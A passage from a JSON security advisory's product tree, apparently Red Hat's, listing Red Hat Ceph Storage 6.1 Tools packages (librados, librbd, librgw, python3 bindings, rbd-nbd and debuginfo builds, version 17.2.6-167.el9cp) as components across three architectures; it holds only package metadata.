"librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados2-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "librados2-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados2-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.s390x" }, "product_reference": "librados2-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados2-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "librados2-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados2-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librados2-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libradospp-devel-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libradospp-devel-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.s390x" }, "product_reference": "libradospp-devel-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libradospp-devel-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "libradospp-devel-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libradosstriper1-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libradosstriper1-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.s390x" }, "product_reference": "libradosstriper1-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libradosstriper1-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "libradosstriper1-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librbd-devel-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "librbd-devel-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librbd-devel-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.s390x" }, "product_reference": "librbd-devel-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librbd-devel-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "librbd-devel-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librbd1-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "librbd1-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librbd1-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.s390x" }, "product_reference": "librbd1-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librbd1-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "librbd1-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librbd1-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librgw-devel-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "librgw-devel-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librgw-devel-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.s390x" }, "product_reference": "librgw-devel-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librgw-devel-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "librgw-devel-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librgw2-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "librgw2-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librgw2-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.s390x" }, "product_reference": "librgw2-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librgw2-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "librgw2-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librgw2-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-ceph-argparse-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.s390x" }, "product_reference": "python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-ceph-common-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-ceph-common-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.s390x" }, "product_reference": "python3-ceph-common-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-ceph-common-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-cephfs-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-cephfs-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.s390x" }, "product_reference": "python3-cephfs-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-cephfs-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "python3-cephfs-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rados-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "python3-rados-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rados-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.s390x" }, "product_reference": "python3-rados-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rados-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "python3-rados-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rbd-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "python3-rbd-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rbd-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.s390x" }, "product_reference": "python3-rbd-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rbd-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "python3-rbd-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rgw-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "python3-rgw-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rgw-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.s390x" }, "product_reference": "python3-rgw-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rgw-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "python3-rgw-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-nbd-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-nbd-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.s390x" }, "product_reference": "rbd-nbd-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-nbd-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "rbd-nbd-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le" }, "product_reference": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": 